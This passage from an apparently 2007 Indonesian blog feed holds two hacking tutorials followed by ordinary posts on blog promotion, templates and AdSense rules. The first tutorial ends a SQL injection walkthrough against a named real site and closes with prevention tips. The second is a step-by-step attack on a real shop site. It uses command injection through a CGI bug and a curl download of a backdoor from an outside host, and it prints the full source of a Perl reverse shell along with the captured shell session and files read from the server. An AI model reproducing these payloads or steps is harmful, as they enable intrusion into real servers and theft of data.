memasukkan parameter di alamat                                  URL-nya.&lt;br /&gt;Contoh                                  :&lt;br /&gt;www.pln-wilkaltim.co.id/dari_Media.asp?id=2119&amp;amp;idm=40&amp;amp;idSM=2&lt;br /&gt;ada                                  parameter id dan idSM.&lt;br /&gt;Setelah kita coba                                  inject, ternyata yang berpengaruh adalah                                 &lt;br /&gt;parameter id aja (CMIIW).&lt;br /&gt;&lt;br /&gt;Kita                                  inject-kan                                  :&lt;br /&gt;www.pln-wilkaltim.co.id/dari_Media.asp?id=2119'                                  having 1=1--&lt;br /&gt;akan keluar pesan error                                  :&lt;br /&gt;---------------------------&lt;br /&gt;Microsoft                                  OLE DB Provider for ODBC Drivers                                  (0x80040E14)&lt;br /&gt;[Microsoft][ODBC SQL Server                                  Driver][SQL Server]Column&lt;br /&gt;'tb_news.NewsId'                                  is invalid in the select list because&lt;br /&gt;it is                                  not contained in an aggregate function and                                 &lt;br /&gt;there is no GROUP BY                                  clause.&lt;br /&gt;/dari_Media.asp, line                                  58&lt;br /&gt;---------------------------&lt;br /&gt;artinya                                  'tb_news.NewsId' itulah nama tabel dan kolom                                  kita&lt;br /&gt;yang pertama.&lt;br /&gt;&lt;br /&gt;Ulangi                                  langkah-langkah kita di atas sampai didapatkan                                  :&lt;br /&gt;tb_news.NewsId =&gt;                                  numeric&lt;br /&gt;tb_news.NewsCatId =&gt;                                  numeric&lt;br /&gt;tb_news.EntryDate =&gt;                                  datetime&lt;br /&gt;tb_news.Title =&gt;                                  nvarchar&lt;br /&gt;tb_news.Content =&gt;                                 &lt;br /&gt;tb_news.FotoLink =&gt;&lt;br /&gt;tb_news.FotoType                                  =&gt; bit data&lt;br /&gt;tb_news.review =&gt;                                 &lt;br /&gt;tb_news.sumber =&gt;                                  char&lt;br /&gt;tb_news.dateagenda =&gt;                                  datetime&lt;br /&gt;&lt;br /&gt;Nah, selanjutnya adalah tugas                                  anda sendiri untuk mengembangkan&lt;br /&gt;pengetahuan                                  anda.&lt;br /&gt;Anda bisa men-insert berita yang bisa                                  anda tentukan sendiri&lt;br /&gt;isinya.&lt;br /&gt;&lt;br /&gt;Inilah                                  mengapa hole di MS-SQL Server ini demikian                                  berbahaya.&lt;br /&gt;&lt;br /&gt;Perkiraan saya, nama-nama                                  partai di situs KPU yang di-hack&lt;br /&gt;oleh                                  Shizoprenic, juga ada di tabel-tabel suatu                                  database,&lt;br /&gt;jadi tetep bisa dimasuki dengan                                  cara SQL Injection                                  ini.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;******************************************************&lt;br /&gt;KHUSUS                                  BUAT ADMIN &amp;amp; WEB PROGRAMMER                                  !!!&lt;br /&gt;******************************************************&lt;br /&gt;Cara                                  pencegahan yang umum digunakan :&lt;br /&gt;1. Batasi                                  panjang input box (jika memungkinkan),                                  dengan&lt;br /&gt;cara membatasinya di kode program,                                  jadi si cracker pemula&lt;br /&gt;akan bingung sejenak                                  melihat input box nya gak bisa di&lt;br /&gt;inject                                  dengan perintah yang panjang.&lt;br /&gt;2. Filter input                                  yang dimasukkan oleh user, terutama                                  penggunaan&lt;br /&gt;tanda kutip tunggal (Input                                  Validation).&lt;br /&gt;3. Matikan atau sembunyikan                                  pesan-pesan error yang keluar&lt;br /&gt;dari SQL Server                                  yang berjalan.&lt;br /&gt;4. Matikan fasilitas-fasilitas                                  standar seperti Stored Procedures,&lt;br /&gt;Extended                                  Stored Procedures jika memungkinkan.&lt;br /&gt;5. Ubah "Startup and run SQL Server" menggunakan low privilege user&lt;br /&gt;di SQL Server Security                                  tab.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Yah itulah mungkin yang dapat                                  saya ceritakan.....&lt;br /&gt;Hal itu adalah gambaran,                                  betapa tidak amannya dunia internet...&lt;br /&gt;Kalau                                  mau lebih aman, copot kabel jaringan anda, copot                                  disk&lt;br /&gt;drive anda, copot harddisk anda, jual                                  kompie anda !!!&lt;br /&gt;Just kidding                                  )&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Referensi :&lt;br /&gt;[+] sqlinjection,                                  www.BlackAngels.it&lt;br /&gt;[+] anvanced sql injection                                  in sql server applications                                 &lt;br /&gt;(www.ngssoftware.com)&lt;br /&gt;[+] sql injection                                  walktrough (www.securiteam.com)&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7712600665289475099-6033198485355551725?l=gresikblog.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><link>http://gresikblog.blogspot.com/2007/10/sql-injection.html</link><author>noreply@blogger.com (gresikblog)</author><thr:total>0</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-7712600665289475099.post-2840592267861208128</guid><pubDate>Wed, 31 Oct 2007 23:46:00 +0000</pubDate><atom:updated>2007-10-31T16:46:39.377-07:00</atom:updated><title>Connect Back melalui Bug CGI</title><description>&lt;div style="text-align: justify;"&gt;:.:.:.:.:.:..:.:.:.:.:.:..:.:.:.:.:.:..:.:.:.:.:.:..:.:.:.:.:.:..:.:.:.:.:.&lt;br /&gt;&lt;/div&gt;&lt;p style="text-align: justify;"&gt;Penulis tidak bertanggung jawab atas akibat atau dampak yang disebabkan oleh&lt;br /&gt;penggunaan materi dari tutorial ini. Tujuan penulis hanya ingin menyampaikan&lt;br /&gt;materi kepada pihak-pihak yang bertanggung jawab dan "Want to learn", tidak&lt;br /&gt;kepada pihak-pihak yang ingin merugikan orang lain. &lt;br /&gt;.:.:.:.:.:.:..:.:.:.:.:.:..:.:.:.:.:.:..:.:.:.:.:.:..:.:.:.:.:.:..:.:.:.:.:.&lt;br /&gt;&lt;br /&gt;Intro&lt;br /&gt;$&gt;Seperti yang sudah kita tahu Bug CGI memungkinkan kita untuk melaksanakan command-command&lt;br /&gt; untuk meng-eksploitasi sistem. Tetapi hal ini juga dipengaruhi oleh settingan dari sistem&lt;br /&gt; tersebut apakah mengijinkan kita untuk membuat/menulis File di Server tersebut.&lt;br /&gt;&lt;br /&gt;Tujuan&lt;br /&gt;$&gt;Membuat suatu backdoor dengan cara connect back melalui CGI Bug&lt;br /&gt;&lt;br /&gt;Tools atau Softwarez dan Skill yang diperlukan&lt;br /&gt;$&gt;Setidaknya mengerti perintah/command *Nix atau Linux (ls, cp, rm, cat, locate ,dll)&lt;br /&gt;$&gt;Softwarez : Browser HTML (Opera, FireFox, IE, dll)&lt;br /&gt;$&gt;Tools : NetCat dan file backdoor (.txt atau .prl)&lt;br /&gt;&lt;br /&gt;Tutorial&lt;br /&gt;$&gt;Langkah pertama yang harus dilakukan adalah mencari site yang menggunakan CGI dengan bug :&lt;br /&gt; "shop.pl?seite" atau "family_showpage.cgi". Bagaimana mencarinya? yaitu googling dan memasukkan&lt;br /&gt; keyword allinurl dengan tambahan bug diatas. Contoh, allinurl : "shop.pl?seite". Maka kita akan&lt;br /&gt; dapat berbagai macam halaman yang dapat di-tes bugnya. Pilih salah satu dan kita akan memulai mencoba&lt;br /&gt; connect back.&lt;br /&gt;$&gt;Langkah kedua yaitu masukkan perintah/command yang diinginkan diantara char "||", maka perintah kita&lt;br /&gt; akan terlihat seperti ini : |perintah|, selain dengan char pipe(|) bisa juga menggunakan char ";".&lt;br /&gt; Contoh (dengan bug shop.pl?seite) :&lt;br /&gt;&lt;br /&gt; &gt;&gt; https://www.a66.de/cgi-local/shop.pl?seite=hauptseite.html&amp;amp;KNR=3055892&lt;br /&gt; &gt;&gt; https://www.a66.de/cgi-local/shop.pl?seite=hauptseite.html|perintah|&amp;amp;KNR=3055892&lt;br /&gt; &gt;&gt; https://www.a66.de/cgi-local/shop.pl?seite=hauptseite.html|ls|&amp;amp;KNR=3055892&lt;br /&gt;&lt;br /&gt; Maka pada browser kita akan terlihat isi dari direktori server tersebut.&lt;br /&gt; Contoh :&lt;br /&gt; finnishorder.pl formmailmalaysia.pl honeymoon.cfg honeymoon.pl honeymoonfinnishorder.pl&lt;br /&gt; honeymoonorder.pl ikonboard order.pl preise.pl remview.php shop.cfg shop.pl&lt;br /&gt;&lt;br /&gt; Weikkss....Banyak filenya tuh :P&lt;br /&gt;&lt;br /&gt;$&gt;Langkah ketiga cek apakah kita diijinkan untuk menulis/membuat file disana dengan perintah "id"&lt;br /&gt;&lt;br /&gt; &gt;&gt; https://www.a66.de/cgi-local/shop.pl?seite=hauptseite.html|id|&amp;amp;KNR=3055892&lt;br /&gt;&lt;br /&gt; Kalo benar maka akan tampak :&lt;br /&gt;&lt;br /&gt; uid=290076(ade001) gid=103(web) groups=103(web)&lt;br /&gt;&lt;br /&gt; Perhatikan User-idnya, Wah sepertinya kita bisa nih nulis/remove File :D&lt;br /&gt;&lt;br /&gt;$&gt;Selanjutnya kita upload File Backdoor yang kita ambil dari site lain,&lt;br /&gt;&lt;br /&gt; https://www.a66.de/cgi-local/shop.pl?seite=hauptseite.html|curl -o back.txt http://www.goodwillco.com/tes.txt|&amp;amp;KNR=3055892&lt;br /&gt;&lt;br /&gt; Catatan : Site www.goodwillco.com hanya menyediakan file backdoor yaitu tes.txt, kalo sudah tidak ada silahkan&lt;br /&gt; copy-paste teks berikut kedalam Notepad dan simpan dengan Ekstensi *.txt, Coding by 1St :D&lt;br /&gt;&lt;br /&gt;#!/usr/bin/perl&lt;br /&gt;# Remote Connect-Back Backdoor Shell v1.0.&lt;br /&gt;# (c)AresU 2004&lt;br /&gt;# 1ndonesia Security Team (1st)&lt;br /&gt;# AresU[at]bosen.net&lt;br /&gt;# Usage:&lt;br /&gt;# 1) Listen port to received shell prompt using NetCat on your toolbox, for example: nc -l -p 9000&lt;br /&gt;# 2) Remote Command Execution your BackDoor Shell, for example: perl connect.pl &lt;iptoolbox&gt; &lt;ncportlisten&gt;&lt;br /&gt;# --------&lt;br /&gt;# The supplied exploit code is not to be used for malicious purpose, but for educational purpose only. The Authors and 1ndonesian Security Team WILL NOT responsible for anything happened by the couse of using all information on these website.&lt;br /&gt;# ---------&lt;br /&gt;&lt;br /&gt;use Socket;&lt;br /&gt;$pamer="(c)AresU Connect-Back Backdoor Shell v1.0\n1ndonesia Security Team (1st)\n\n";&lt;br /&gt;$cmd= "lpd";&lt;br /&gt;$system= 'echo "`uname -a`";echo "`id`";/bin/sh';&lt;br /&gt;$0=$cmd;&lt;br /&gt;$target=$ARGV[0];&lt;br /&gt;$port=$ARGV[1];&lt;br /&gt;$iaddr=inet_aton($target) || die("Error: $!\n");&lt;br /&gt;$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");&lt;br /&gt;$proto=getprotobyname('tcp');&lt;br /&gt;socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");&lt;br /&gt;connect(SOCKET, $paddr) || die("Error: $!\n");&lt;br /&gt;open(STDIN, "&gt;&amp;amp;SOCKET");&lt;br /&gt;open(STDOUT, "&gt;&amp;amp;SOCKET");&lt;br /&gt;open(STDERR, "&gt;&amp;amp;SOCKET");&lt;br /&gt;print STDOUT $pamer;&lt;br /&gt;system($system);&lt;br /&gt;close(STDIN);&lt;br /&gt;close(STDOUT);&lt;br /&gt;close(STDERR)&lt;br /&gt;&lt;br /&gt; Catatan2 : curl -o akan menyimpan file backdoor di server web sasaran dengan nama back.txt&lt;br /&gt; Kalo curl -o tidak bisa gunakan wget -o.&lt;br /&gt;&lt;br /&gt;$&gt; Lakukan lagi perintah ls untuk melihat apakah file backdoor kita sudah ter-upload...&lt;br /&gt;&lt;br /&gt;  https://www.a66.de/cgi-local/shop.pl?seite=hauptseite.html|ls|&amp;amp;KNR=3055892&lt;br /&gt;&lt;br /&gt;  back.txt finnishorder.pl formmailmalaysia.pl honeymoon.cfg honeymoon.pl honeymoonfinnishorder.pl&lt;br /&gt;  honeymoonorder.pl ikonboard order.pl preise.pl remview.php shop.cfg shop.pl&lt;br /&gt;&lt;br /&gt;  Tampaknya file backdoor kita sudah ada tuh :D&lt;br /&gt;&lt;br /&gt;$&gt; Buka port di kompie kita dengan binding port melalui netcat.exe, Perintahnya &gt;&lt;br /&gt; &lt;br /&gt;  C:\&gt;netcat.exe -lLvvp 9000&lt;br /&gt; &lt;br /&gt;  catatan: port 9000 dan drive system bisa diganti sesuai dengan kondisi komputer masing2 :D&lt;br /&gt;&lt;br /&gt;  Kalo sudah maka netcat akan melisten koneksi yang masuk di port 9000 tersebut&lt;br /&gt;&lt;br /&gt;$&gt; Kita akan melakukan connectback dari server korban dengan meng-compile file backdorr tsb :&lt;br /&gt;&lt;br /&gt;  https://www.a66.de/cgi-local/shop.pl?seite=hauptseite.html|PERL back.txt 61.xxx.xxx.xxx 9000|&amp;amp;KNR=3055892&lt;br /&gt;&lt;br /&gt;  catatan: ip 61.xxx.xxx.xxx adalah alamat IP komputer kita dan 9000 adalah port tujuan yang sudah terbuka&lt;br /&gt;  jika komputer kita memakai proxy atau firewall harap di konfigurasi ulang agar server korban bisa melakukan&lt;br /&gt;  connectback terhadap kita :D&lt;br /&gt;&lt;br /&gt;  Bila benar maka :&lt;br /&gt;&lt;br /&gt;C:\&gt;netcat -lLvvp 9000&lt;br /&gt;listening on [any] 9000 ...&lt;br /&gt;connect to [61.xxx.xxx.xxx] from www.a66.de [213.198.17.90] 14542&lt;br /&gt;(c)AresU Connect-Back Backdoor Shell v1.0&lt;br /&gt;1ndonesia Security Team (1st)&lt;br /&gt;&lt;br /&gt;Linux a66.de 2.4.2 FreeBSD 4.7-RELEASE-p22 #5: Tue May  3 13:36:49 MDT 2005&lt;br /&gt;   roo i386 unknown&lt;br /&gt;uid=290076(ade001) gid=103(web) groups=103(web)&lt;br /&gt;ls&lt;br /&gt;back.txt&lt;br /&gt;finnishorder.pl&lt;br /&gt;formmailmalaysia.pl&lt;br /&gt;honeymoon.cfg&lt;br /&gt;honeymoon.pl&lt;br /&gt;honeymoonfinnishorder.pl&lt;br /&gt;honeymoonorder.pl&lt;br /&gt;ikonboard&lt;br /&gt;order.pl&lt;br /&gt;preise.pl&lt;br /&gt;remview.php&lt;br /&gt;shop.cfg&lt;br /&gt;shop.pl&lt;br /&gt;su&lt;br /&gt;su: you are not in the correct group (sys) to su root.&lt;br /&gt;&lt;br /&gt;  weiikkssss....bisa konek ternyata :D, tapi sayangnya kita gak bisa akses super user tuh :(&lt;br /&gt;  Mungkin kita bisa liat groupnya :&lt;br /&gt;&lt;br /&gt;  https://www.a66.de/cgi-local/shop.pl?seite=hauptseite.html|ls /etc|&amp;amp;KNR=3055892&lt;br /&gt;&lt;br /&gt;  DIR_COLORS X11 bashrc csh.cshrc csh.login filesystems group host.conf hosts.allow hosts.deny info-dir inputrc&lt;br /&gt;  ld.so.cache ld.so.conf ldap_auth master.passwd mhpop_redirect mtab nsswitch.conf opt pam.d passwd profile profile.d&lt;br /&gt;  redhat-release rpc rpm securetty shells skel ssd.attrib syb_dbs termcap xinetd.d yp.conf&lt;br /&gt;&lt;br /&gt;  https://www.a66.de/cgi-local/shop.pl?seite=hauptseite.html|cat /etc/group|&amp;amp;KNR=3055892&lt;br /&gt;&lt;br /&gt;  sys::0:root,bin,sys,adm,devel,smoc1,daemon,vbackups,sap,sentinel root::0:root daemon::1:root,daemon bin::2:root,bin,daemon&lt;br /&gt;  adm::3:root,adm,daemon mail::4:root uucp::5:uucp rje::8: lp:*:9: nuucp::10:nuucp user::20: ftp::201:&lt;br /&gt;other::995: guest:*:998: postgres:*:70: news:*:86: mysql:*:88: sql:*:89: staff::100:devel,smoc1 sybase::101:sybase,devel,webapps,sap,jkoecher,anonweb&lt;br /&gt;client:*:102:devel,root,webapps,urchind web:*:103:root,webapps nofiles:*:104: qmail:*:105: devel:*:106:sybase,hu,webapps,sap,ftp,jkoecher,anonweb mailed:*:107:barryg&lt;br /&gt;apps:*:108:hu,idsuser networks:*:109: squid:*:203: solutions:*:1025: test:*:204: dnsadmin:x:501:named tsedit:*:110:lvance,chuckr,eduda,ggarza,steve,mbalme mailedit:*:111:mminnig&lt;br /&gt;  nogroup:*:65533: webapps:*:149: sap:*:191: nobody:*:60001: smmsp:*:25:smmsp&lt;br /&gt;&lt;br /&gt;  Wekkksss...... :( ternyata kita hanya ada di group web doank :~~...gimana ngerubahnya ???&lt;br /&gt;  sayangnya tutorial ini hanya membahas caraa kita untuk melakukan connectback dengan menggunakan CGI BUG&lt;br /&gt;  Untuk lebih jelasnya silakan cari artikel ttg hal tsb di Google :D&lt;br /&gt;  Terus kita bisa ngapain ajah nih??? ya macam2 kayak liat file order.log-nya mungkin !!!???? :D&lt;br /&gt;  (ingat site ini adalah semacam online-shop :D), silakan masukkan perintah locate order.log atau&lt;br /&gt;   locate .log di browser anda :D hehehehehehhe&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Special Thanks go to : Myztx @ Myztx Soft House, Om choi @ #e-c-h-o atas tutor dan kesabarannya dalam mengajari junior mu ini :D&lt;br /&gt;                      , admin www.a66.de hehehehe jangan marah ya mas/mbak :P webnya dijadikan percobaan :D&lt;br /&gt;                      n ndak lupa juga to Spyro (the dragon??? :P) atas tempat buat artikel ini di webnya yg makin ciamik :D&lt;/ncportlisten&gt;&lt;/iptoolbox&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7712600665289475099-2840592267861208128?l=gresikblog.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><link>http://gresikblog.blogspot.com/2007/10/connect-back-melalui-bug-cgi.html</link><author>noreply@blogger.com (gresikblog)</author><thr:total>0</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-7712600665289475099.post-3381256216195979404</guid><pubDate>Wed, 31 Oct 2007 23:42:00 +0000</pubDate><atom:updated>2007-10-31T16:43:18.566-07:00</atom:updated><title>Cara Praktis Promosi Blog</title><description>&lt;p&gt;Setelah selesai membuat blog, hal yg tak kalah pentingnya adalah empromosikan/memperkenalkan blog milik Anda pada dunia ramai. Apa gunanya membuat blog kalau isi curhat, puisi, cerpen, refleksi dan opini Anda yang diposting tidak dibaca orang, bukan?&lt;/p&gt; &lt;p&gt;Ikuti langkah-langkah promosi blog sebagai berikut:&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;strong&gt;(1) Daftarkan di blog directory&lt;/strong&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;Daftarkan blog Anda ke berbagai direktori blog (blog directory). Sedikitnya, daftarkan di tiga blog directory terbesar dan terpopuler, yaitu (a) &lt;a target="new" href="http://technorati.com/"&gt;http://technorati.com&lt;/a&gt; (b) &lt;a target="new" href="http://feeburner.com/"&gt;http://feeburner.com&lt;/a&gt; (c) &lt;a target="new" href="http://blogdigger.com/"&gt;http://blogdigger.com&lt;/a&gt;. Ikuti seluruh petunjuk pada ketiga blog directory tsb ketika mendaftar.&lt;/span&gt;&lt;/span&gt;&lt;span class="fullpost"&gt;&lt;span class="fullpost"&gt;Blog-blog directory ini nantinya secara otomatis akan mengirim data blog dan posting-posting anda ke berbagai search engine, termasuk tiga search engine besar yaitu http://google.com, http://msn.com, &lt;a href="http://yahoo.com/"&gt;http://yahoo.com&lt;/a&gt;.&lt;/span&gt;&lt;/span&gt;&lt;/p&gt; &lt;p&gt;&lt;span class="fullpost"&gt;&lt;span class="fullpost"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="fullpost"&gt;&lt;span class="fullpost"&gt;&lt;strong&gt;(2) Link-trade, Link Exchange atau Tukar Link&lt;/strong&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="fullpost"&gt;&lt;span class="fullpost"&gt; &lt;/span&gt;&lt;/span&gt;&lt;span class="fullpost"&gt;&lt;span class="fullpost"&gt;Ajak teman anda yg memiliki blog untuk saling tukar link. Link URL anda di blog dia, dan jangan lupa anda juga memasukkan link blog teman anda tsb. di blog anda. Dalam dunia blog, ini disebut juga dg istilah BLOGROLL. Dan blogroll ini salah satu penyebab cepatnya popularitas blog di seluruh dunia, mengalahkan website yg biasa.&lt;/span&gt;&lt;/span&gt;&lt;/p&gt; &lt;p&gt;Blogroll atau link-exchange tidak harus melalui permintaan, bisa juga dg saling suka rela. Umpamanya, ada seseorang blogger (pemilik blog) yg memasang link Anda di blog dia, apabila Anda tahu, maka Anda juga “berkewajiban” menambah link blog dia di blog Anda. Apabila tidak, maka akan dicap sebagai “blogger pelit”. Di dunia maya pun, sebagaimana di dunia nyata, orang pelit akan selalu teralienasi. Dg kata lain, sedikit “tamu”nya. &lt;img src="http://afatih.wordpress.com/wp-includes/images/smilies/icon_smile.gif" alt=":)" class="wp-smiley" /&gt; &lt;/p&gt; &lt;p&gt;Nah, bagaimana cara mengetahui ada yg mengelink blog Anda? Caranya mudah: tulis di kotak &lt;a href="http://technorati.com/search"&gt;http://technorati.com/search&lt;/a&gt; alamat blog Anda atau blog siapa saja yg ingin Anda ketahui. Contoh blog ini, &lt;a href="http://kolom-mario.blogspot.com/"&gt;http://afatih.wordpress.com&lt;/a&gt;, setelah itu tekan search, anda akan tahu siapa saja yg ngelink ke blog tsb.&lt;/p&gt; &lt;p&gt;Sebagai langkah pertama ‘proyek’ tukar link, Anda bisa mencoba dg memasang link blog &lt;a target="new" href="http://afsyuhud.blogspot.com/"&gt;http://fatihsyuhud.com&lt;/a&gt; di sidebar blog Anda. Dalam waktu tidak lama, alamat blog Anda akan tampil di blognya.&lt;/p&gt; &lt;p&gt;&lt;strong&gt;(3) Berkunjung ke blog lain&lt;/strong&gt;&lt;/p&gt; &lt;p&gt;Untuk menambah teman untuk diajak blogroll, sempatkan berkunjung ke blog2 lain, dan berkomentar di bukutamu atau tagboard mereka atau berkomentar di tulisan mereka sambil jangan lupa memasang alamat blog Anda di blog mereka. Dalam waktu tidak lama, mereka akan “bertamu balik” ke “rumah” atau blog Anda.&lt;/p&gt; &lt;p&gt;&lt;strong&gt;(4) Aktivitas posting&lt;/strong&gt;&lt;br /&gt;Usahakan sedikitnya satu kali posting setiap harinya. Posting yg teratur di blog, akan membuat tamu datang secara teratur juga.&lt;/p&gt; &lt;p&gt;&lt;strong&gt;(5) Alamat blog di signature email&lt;/strong&gt;&lt;br /&gt;Tulis alamat blog Anda di signature email. Sehingga setiap anda menulis email ke pribadi atau ke milis, alamat blog anda akan selalu muncul, dan “menggoda” orang untuk berkunjung. Memposting ringkasan tulisan di blog Anda ke milis juga akan sangat menggoda member milis untuk datang ke blog Anda. (bersambung)&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7712600665289475099-3381256216195979404?l=gresikblog.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><link>http://gresikblog.blogspot.com/2007/10/cara-praktis-promosi-blog.html</link><author>noreply@blogger.com (gresikblog)</author><thr:total>0</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-7712600665289475099.post-3308371022236049572</guid><pubDate>Wed, 31 Oct 2007 23:39:00 +0000</pubDate><atom:updated>2007-10-31T16:40:32.266-07:00</atom:updated><title>Tips Memilih Template</title><description>Terkadang kita begitu terobsesi dengan template yang ‘glamour.’ Hal ini ditambah dengan begitu banyaknya pilihan template/themes yang beraneka warna. Banyak yang lupa bahwa visitor tidak begitu peduli dengan glamornya template yang kita pakai. Orang masuk ke blog kita umumnya karena isinya yang menarik, orisinil dan unik. &lt;p&gt;Selain itu, kalau kita perhatikan, situs-situs bertraffic tinggi rata-rata berpenampilan sederhana. Lihat misalnya tiga situs bertraffic tertinggi di dunia: google.com, yahoo.com dan msn.com. Ketiganya memakai template minimalist: background putih, font tulisan warna hitam dan warna tulisan di menunya yang tidak menyolok. Google.com, situs no. 1 di dunia termasuk pelopor minimalist di mana cuma ada kotak search engine dan sedikit menu link di atasnya. Dulu, yahoo.com memiliki banyak link di halaman utama / frontpage-nya, tapi sekarang sudah ‘ketularan’ google. Intinya, &lt;em&gt;the simpler the better. &lt;/em&gt;Saya sendiri males berkunjung untuk kedua kalinya pada sebuah blog yang terlalu ribet dan berat loadingnya karena kebanyakan script yang terpasang.&lt;br /&gt;&lt;span id="more-403"&gt;&lt;/span&gt;&lt;br /&gt;Oleh karena itu, memilih template harus mempertimbangkan poin-poin di atas: pilihlah template atau themes yang rapi, background warna yang sederhana, dan warna font artikel yang enak dibaca. Saya pribadi memilih themes &lt;em&gt;black and white &lt;/em&gt;untuk &lt;a href="http://www.fatihsyuhud.com/"&gt;www.site.com&lt;/a&gt;. Pengunjung blog saya datang kebanyakan dari search engine. Mereka datang tentunya karena ingin membaca lebih lanjut artikel yang mereka cari. Saya tidak ingin mengganggu mata mereka dengan warna-warna yang “menyilaukan”.&lt;/p&gt; &lt;p&gt;Selain itu, tak kalah pentingnya adalah “kerapian blog.” Blog yang rapi artinya: (a) sidebar &lt;a target="_blank" href="http://afatih.wordpress.com/tutorial-blog/mengapa-blog-melorot/" title="Blog melorot"&gt;tidak melorot&lt;/a&gt;; (b) font artikel cukup satu warna dan satu macam; (c) blogroll atau banner terpasang rapi dan tertata; (d) cocok dibuka dengan berbagai browser, terutama IE dan firefox.&lt;/p&gt; &lt;p&gt;Bagaimana dg Anda? Apakah Anda suka blog rapi atau yang “rame?”&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7712600665289475099-3308371022236049572?l=gresikblog.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><link>http://gresikblog.blogspot.com/2007/10/tips-memilih-template.html</link><author>noreply@blogger.com (gresikblog)</author><thr:total>0</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-7712600665289475099.post-4478863126177253548</guid><pubDate>Wed, 31 Oct 2007 23:36:00 +0000</pubDate><atom:updated>2007-10-31T16:37:46.058-07:00</atom:updated><title>Jangan Klik Sendiri Adsense Anda</title><description>Program Adsense memiliki sejumlah tata tertib yg harus dipenuhi oleh publisher–yakni kita-kita yg memasang Adsense di blog masing-masing. Aturan lengkapnya dapat dibaca sewaktu pertama kali kita daftar. Bagi yg lupa, silahkan baca lagi TOS (terms of service) &lt;a target="_blank" href="https://www.google.com/adsense/support/bin/answer.py?answer=48182&amp;amp;sourceid=aso&amp;amp;subid=ww-ww-et-asui&amp;amp;medium=link&amp;amp;hl=en_US&amp;amp;gsessionid=nVEws-9RD2M"&gt;di sini&lt;/a&gt; agar supaya tidak salah dan berakibat akun Adsense Anda ditutup.&lt;br /&gt;&lt;span&gt;&lt;br /&gt;Dari sekian aturan Adsense, yg paling penting adalah: (1) Jangan klik sendiri iklan adsense Anda; (2) Jangan menyuruh orang lain mengklik Adsense Anda; (3) Jangan membuat kalimat yg terkesan menyuruh atau menganjurkan tamu/pengunjung untuk mengklik Iklan di blog Anda, kecuali &lt;a target="_blank" href="http://afatih.wordpress.com/2006/07/17/google-adsense-referral/"&gt;iklan adsense referral&lt;/a&gt;.&lt;/span&gt;&lt;span&gt; &lt;/span&gt; &lt;p&gt;&lt;span&gt;&lt;span id="more-362"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span&gt;&lt;strong&gt;Bagaimana bisa ketahuan?&lt;/strong&gt;&lt;/span&gt;&lt;/p&gt; &lt;p&gt;1. Iklan Adsense dilengkapi dg alat pelacak (tracking) yg menunjukkan nomor IP internet Anda. Bila Anda klik sendiri, maka akan tampak jelas kelihatan oleh manajer Adsense.&lt;/p&gt; &lt;p&gt;2. Apabila Anda menyuruh teman Anda di tempat lain dg nomor IP berbeda dg Anda, maka mungkin kalau satu kali klik tidak apa-apa, tapi akan ketahuan begitu IP yg sama mengklik Adsense Anda setiap hari.&lt;/p&gt; &lt;p&gt;3. Umumnya persentase iklan yg diklik berkisar antara 1 sampai 10% dari jumlah pengunjung blog. Contohnya, apabila tamu blog dalam sehari ada 20 orang, maka paling banyak yg klik 2 (dua) pengunjung.&lt;/p&gt; &lt;p&gt;Dengan demikian, semakin besar pengunjung semakin besar yg ngeklik. Jadi, daripada pakai cara ilegal, mending usahakan untuk menambah pengunjung blog dg cara rajin posting dan &lt;a target="_blank" href="http://afatih.wordpress.com/2005/12/09/cara-praktis-promosi-blog-2/"&gt;promosi blog&lt;/a&gt;.&lt;/p&gt; &lt;p&gt;&lt;strong&gt;Kapan “hukuman” Adsense tiba?&lt;/strong&gt;&lt;/p&gt; &lt;p&gt;Hukuman berupa ditutupnya akun (account) Adsense Anda terjadi biasanya apabila hasil adsense sudah mendekati angka $60 sampai 90. Anda biasanya akan diberitahu via email, selain itu Adsense tidak lagi nongol di blog Anda.&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7712600665289475099-4478863126177253548?l=gresikblog.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><link>http://gresikblog.blogspot.com/2007/10/jangan-klik-sendiri-adsense-anda.html</link><author>noreply@blogger.com (gresikblog)</author><thr:total>0</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-7712600665289475099.post-7120686880555502816</guid><pubDate>Wed, 31 Oct 2007 23:21:00 +0000</pubDate><atom:updated>2007-10-31T16:30:40.188-07:00</atom:updated><title>Permasalahan Post-Summary (Abstraksi) Blogspot</title><description>&lt;p&gt;Yg saya maksud dg “penyakit” adalah bugs dalam script. Bahasa tepatnya biar ahli linguistic IT nanti yg bahas.&lt;/p&gt; &lt;p&gt;Sebelumnya, sudah diterangkan di sini bagaimana cara membuat abstraksi posting di blogger/blogspot supaya tidak semua posting kita tampil di halaman muka. (Apabila Anda lupa, silahkan lihat lagi &lt;a target="new" href="http://kolom-mario.blogspot.com/2005/12/post-summary-abstraksi-posting-di.html"&gt;di sini.&lt;/a&gt;&lt;br /&gt;&lt;span 